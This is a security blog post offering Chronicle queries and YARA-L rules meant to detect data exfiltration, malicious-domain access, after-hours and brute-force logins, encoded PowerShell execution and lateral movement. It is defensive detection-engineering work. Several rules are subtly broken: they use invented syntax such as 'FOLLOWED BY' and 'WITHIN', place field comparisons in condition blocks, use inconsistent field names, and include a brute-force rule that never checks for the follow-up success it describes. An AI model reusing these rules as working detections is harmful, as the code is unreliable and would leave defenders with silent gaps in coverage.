Chronicle Detection Engineering

Published by Matt Clemons on

Having robust and flexible detections is critical for identifying and addressing potential threats. Google Chronicle enables custom detection engineering by combining queries and YARA-L rules to surface suspicious events and trigger alerts. Below, I’ll outline six essential Chronicle queries along with six detailed rules, each tailored to cover a vital detection scenario. These examples are very basic but serve as a framework that can be tailored to specific enterprise use cases.

Large Data Transfers to External IPs

Query:

metadata.event_type = "NETWORK_CONNECTION" 
AND network.direction = "OUTBOUND" 
AND network.sent_bytes > 5000000 
AND NOT target.ip_address IN list("internal_ip_list")

Rule:

rule data_exfiltration_detection {
  meta:
    author = "SecurityTeam"
    description = "Detects high-volume data exfiltration to external IPs using a list"
    severity = "High"
  
  events:
    $exfil_event.metadata.event_type = "NETWORK_CONNECTION"
    $exfil_event.network.sent_bytes = $bytes
  
  condition:
    $exfil_event.network.direction = "OUTBOUND" 
    and $exfil_event.network.sent_bytes > 5000000
    and $exfil_event.target.ip_address not in list("internal_ip_list")
  
  outcome:
    $data_exfil = max($exfil_event.network.sent_bytes)
}

Access to Known Malicious Domains

Query:

metadata.event_type = "NETWORK_CONNECTION" 
AND (target.hostname IN list("malicious_domains_list") 
    OR target.ip_address IN list("malicious_ips_list"))

Rule:

rule malicious_domain_access {
  meta:
    author = "SecurityTeam"
    description = "Detects access to known malicious domains or IP addresses"
    severity = "Critical"
  
  events:
    $malicious_conn.metadata.event_type = "NETWORK_CONNECTION"
  
  condition:
    ($malicious_conn.target.hostname IN list("malicious_domains_list") 
    OR $malicious_conn.target.ip_address IN list("malicious_ips_list"))
  
  outcome:
    $access = max(100)
}

Unusual Login Patterns

Query:

metadata.event_type = "USER_LOGIN" 
AND security_result.action = "ALLOW" 
AND (timestamp.get_hour(metadata.event_timestamp.seconds, "UTC") < 6 
    OR timestamp.get_hour(metadata.event_timestamp.seconds, "UTC") > 19)

Rule:

rule after_hours_login {
  meta:
    author = "SecurityTeam"
    description = "Detects logins outside of business hours"
    severity = "Medium"
  
  events:
    $login_event.metadata.event_type = "USER_LOGIN"
  
  condition:
    (timestamp.get_hour($login_event.metadata.event_timestamp.seconds, "UTC") < 6 
    OR timestamp.get_hour($login_event.metadata.event_timestamp.seconds, "UTC") > 19)
  
  outcome:
    $after_hours_access = max(75)
}

Multiple Failed Login Attempts Followed by a Successful Login

Query:

metadata.event_type = "USER_LOGIN" 
AND principal.ip_address = $ip
AND (
    (security_result.action = "DENY" 
    AND count(metadata.event_type) >= 5 WITHIN 5m) 
    FOLLOWED BY 
    (security_result.action = "ALLOW" 
    AND principal.ip_address = $ip)
)

Rule:

rule potential_bruteforce {
  meta:
    author = "SecurityTeam"
    description = "Detects multiple failed logins followed by a success"
    severity = "High"
  
  events:
    $login_attempt.metadata.event_type = "USER_LOGIN"
  
  condition:
    $login_attempt.security_result.action = "DENY" AND count(metadata.event_type) >= 5 WITHIN 5m
  
  outcome:
    $brute_force_detected = max(90)
}

PowerShell with Encoded Commands

Query:

metadata.event_type = "PROCESS_LAUNCH" 
AND target.process.command_line CONTAINS "-EncodedCommand"

Rule:

rule suspicious_command_execution {
  meta:
    author = "SecurityTeam"
    description = "Detects PowerShell execution with encoded commands"
    severity = "High"
  
  events:
    $command_event.metadata.event_type = "PROCESS_LAUNCH"
  
  condition:
    $command_event.target.process.command_line CONTAINS "-EncodedCommand"
  
  outcome:
    $suspicious_execution = max(100)
}

Suspicious Lateral Movement Detection

Query:

metadata.event_type = "NETWORK_CONNECTION" 
AND network.direction = "INTERNAL" 
AND network.bytes_sent > 1000000 
AND target.hostname NOT IN list("trusted_hosts_list")

Rule:

rule suspicious_lateral_movement {
  meta:
    author = "SecurityTeam"
    description = "Detects unusual lateral movement within the network"
    severity = "Medium"
  
  events:
    $internal_conn.metadata.event_type = "NETWORK_CONNECTION"
  
  condition:
    $internal_conn.network.direction = "INTERNAL" 
    and $internal_conn.network.bytes_sent > 1000000
    and $internal_conn.target.hostname not in list("trusted_hosts_list")
  
  outcome:
    $lateral_movement_detected = max(85)
}

Conclusion

These queries and rules address multiple threat scenarios, from detecting large data transfers to monitoring unusual login times and identifying lateral movement. By implementing this detection suite, security teams can enhance visibility and respond effectively to a range of potential threats in their networks. Tailor lists (e.g., for trusted or internal hosts) and adjust thresholds to match your organization’s unique needs, ensuring relevant and actionable alerts.

Categories: Security

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

CISSP Equations

I have trouble remembering all of these, so I’m stashing them here. 1. Risk Management Equations 2. System Reliability and Maintenance Metrics 3. Cryptography and Access Control Calculations 4. Probability and Bayesian Analysis 5. Quantitative Read more…

Security

IR 1: Introduction to Incident Handling

Introduction In incident response, following a structured approach is fundamental to maintaining clarity, control, and precision. This post covers the essential concepts in incident handling, breaking down the life cycle stages and key operations within Read more…

Security

Detection Engineering 5: Taking Action

The goal of detection engineering isn’t just to identify potential threats but to take meaningful action based on those findings. After documenting and analyzing your results, it is time to determine which findings require escalation, Read more…